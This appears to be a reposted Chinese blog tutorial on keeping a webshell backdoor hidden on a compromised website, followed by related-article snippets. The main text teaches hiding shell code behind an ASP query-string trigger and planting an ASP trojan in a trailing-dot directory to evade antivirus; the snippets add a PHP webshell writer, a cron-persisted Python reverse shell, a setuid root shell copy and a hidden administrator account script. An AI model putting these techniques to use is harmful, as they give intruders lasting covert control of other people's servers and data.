如何更简单的留你的webshell后门

最新推荐文章于 2022-01-26 17:30:11 发布
最新推荐文章于 2022-01-26 17:30:11 发布
阅读量286 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/461952
版权
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的, 

1.下面教一种很菜的方法,ASP插入法,不容易被发现~ 
在我们要做手脚的ASP文件里加入如下内容 
<% if request("action")="ok" then %> 
*********************** 
<% end if %> 
  

在***********处加入你的shell代码 
就哦克了 
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell) 
就可以调出webshell了,不影响正常浏揽 
2.还有一种方法 
前提是得到系统权限之后, 
telnet肉肉IPPort 
成功telnet之后,传一个asp木马 
进入网站目录 
最后是在下一层吧 
md s...\ 
copy 1.asp s.../ 
OK,这样防毒软件就搞不到了 

防问时 [url]http://your[/url] 肉肉/s.../1.asp















本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8555,如需转载请自行联系原作者


weixin_33744854
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 简单webshell_一个简单webshell
weixin_35430535的博客
02-26 684
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
shell后门方法
weixin_30849403的博客
12-26 130
php: $dir = 'aaa/'; createDir($dir); $fp = fopen($dir.'xxxx.php', "w"); fputs($fp, '<?php echo "error";preg_replace("/test/e",$_REQUEST[\'abc\'],"jutst test")?>'); f...
如何做一个简单后门
07-11
加你怎么做简单后门,这是个非常简单的,要用到易语言。
给手机端页面一个调试后门吧(vue)
aopcxymvy15996241的博客
09-04 223
当我们在浏览器开发vue页面时,由于浏览器对于调试有天然的支持,我们开发起来很方便。但是现在已经进入了移动端时代,移动端页面的需求越来越大。 在开发移动端页面的时候我们通常是在浏览器完成开发完成,之后才在手机端测试,如果测试出现问题还得重新回到浏览器上寻找错误。甚至还有嵌入在APP的页面,经过调试之后还要重新发包。当然还有加奇怪的现象,由于手机浏览器和Web浏览器的差异,经常会发现...
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
WebShellWebshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
php webshell后门
03-31
php webshell后门,未加密
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合多种...
简单给站点后门
weixin_34292287的博客
05-18 461
<%ifrequest.QueryString("action")="comeon"then a=Request.TotalBytes:ifaThenb="adodb.stream":Setc=Createobject(b):c.Type=1:c.Open:c.WriteRequest.BinaryRead(a):c.Position=0:d=c.Rea...
一条命令实现命令行反弹后门
weixin_34149796的博客
02-04 288
TCP反弹后门//python版本,kali下面测试成功,tcp8080: (crontab-l;printf"*/5****/usr/bin/python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.1...
服务器隐藏账户的攻与防
testalllife的专栏
09-06 1211
一.建立一个别人永远删不掉的管理员用户操作步骤:      1、在自己电脑里面建立一个.txt文本文件.      2、在里面输入内容@echo offnet user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;net localgroup administrators xixi /add     3、把这个文件保存,改后缀为xixi.bat
***技巧系列之常见的一些后门手法
weixin_34237596的博客
02-11 1252
对于我们这样的菜手,好不容易搞了台服务器很不容易,如果被发现了就惨了。其实,开后门的方法有很多种,下面我来说说,我以前学习过的几种方法。 1. Setuid #cp /bin/sh /tmp/.root#chmod u+s /tmp/.root 加上 suid 位到shell 上,虽然很简单,但容易被发现。 2. Echo "hack:...
WEB程序中隐藏后门
04-15 774
 作者: 空虚浪子心  在很多商业程序中,程序员也许会出于某种目的,在程序中后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到数据库,分析了一段时间以后才拿到程序,相信我也不会注意这个问题。某账户,在后台查询管理员账户的时候,他不出现,在管
使用python简单实现webshell
m0_37845900的博客
01-26 2493
服务器代码 #-*- encoding:utf-8 -*- #author: zhiminliu import tornado.web import tornado.websocket import tornado.httpserver import tornado.ioloop import paramiko import time import socket import sys import threading import Queue import json class
webshell下LINUX提权+后门
weixin_30861797的博客
05-02 119
方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -...
webshell后门上传流程
weixin_34290096的博客
07-08 1497
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站U...
webshell后门
最新发布
07-27
攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除文件,执行系统命令等。\[2\] 一个常见的Webshell后门示例是PHP代码,如下所示: ```php @$a = $_COOKIE\[1\]; $b =''; $c=''; @assert($b.$a); ?> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值